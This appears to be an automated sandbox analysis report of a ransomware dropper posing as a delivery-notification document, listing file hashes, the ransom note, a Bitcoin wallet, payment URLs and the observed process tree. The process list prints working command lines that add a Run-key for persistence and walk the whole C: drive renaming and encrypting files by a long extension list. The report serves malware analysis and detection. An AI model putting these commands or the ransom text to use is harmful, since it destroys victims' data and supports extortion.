Resubmissions

17-01-2021 18:02

210117-v36h76g17e 10

15-01-2021 15:50

210115-6zp7zwzspx 10

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-01-2021 15:50

General

  • Target

    Delivery_Notification_00896328.doc.js

  • Size

    248KB

  • MD5

    0168089428c6aa371f4275d0872b0970

  • SHA1

    d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e

  • SHA256

    dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a

  • SHA512

    915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\a.txt

Ransom Note
ATTENTION! All your documents, photos, databases and other important personal files were encrypted using strong RSA-1024 algorithm with a unique key. To restore your files you have to pay 0.54309 BTC (bitcoins). Please follow this manual: 1. Create Bitcoin wallet here: https://blockchain.info/wallet/new 2. Buy 0.54309 BTC with cash, using search here: https://localbitcoins.com/buy_bitcoins 3. Send 0.54309 BTC to this Bitcoin address: 19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ 4. Open one of the following links in your browser to download decryptor: http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ 5. Run decryptor to restore your files. PLEASE REMEMBER: - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES. - Nobody can help you except us. - It`s useless to reinstall Windows, update antivirus software, etc. - Your files can be decrypted only after you make payment. - You can find this manual on your desktop (DECRYPT.txt).
Wallets

19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

URLs

http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\system32\reg.exe
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        3⤵
        • Adds Run key to start application
        PID:432
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:328
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        3⤵
        • Modifies registry class
        PID:1228
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1064
      • C:\Windows\system32\reg.exe
        REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        3⤵
        • Modifies registry class
        PID:1624
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
      2⤵
      PID:1032
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" k6cdgj99hsftmhewo48hy6twl4xp299iukus)
      2⤵
      PID:684
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
      2⤵
      PID:576

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    Registry Run Keys / Startup Folder (T1060)
    1
  • Defense Evasion
    Modify Registry (T1112)
    2
    Install Root Certificate (T1130)
    1

Downloads

  • C:\Users\Admin\AppData\Local\Temp\a.txt
    MD5

    512ad548377714262b373c665f17d1db

    SHA1

    0f05efd559b90eb77418c32fa86cfcba77b6e187

    SHA256

    27966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca

    SHA512

    f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943

  • memory/328-4-0x0000000000000000-mapping.dmp
  • memory/432-11-0x0000000000000000-mapping.dmp
  • memory/540-3-0x0000000000000000-mapping.dmp
  • memory/576-7-0x0000000000000000-mapping.dmp
  • memory/684-10-0x0000000000000000-mapping.dmp
  • memory/1032-6-0x0000000000000000-mapping.dmp
  • memory/1064-5-0x0000000000000000-mapping.dmp
  • memory/1228-8-0x0000000000000000-mapping.dmp
  • memory/1436-2-0x000007FEF6350000-0x000007FEF65CA000-memory.dmp
    Filesize

    2.5MB

  • memory/1624-9-0x0000000000000000-mapping.dmp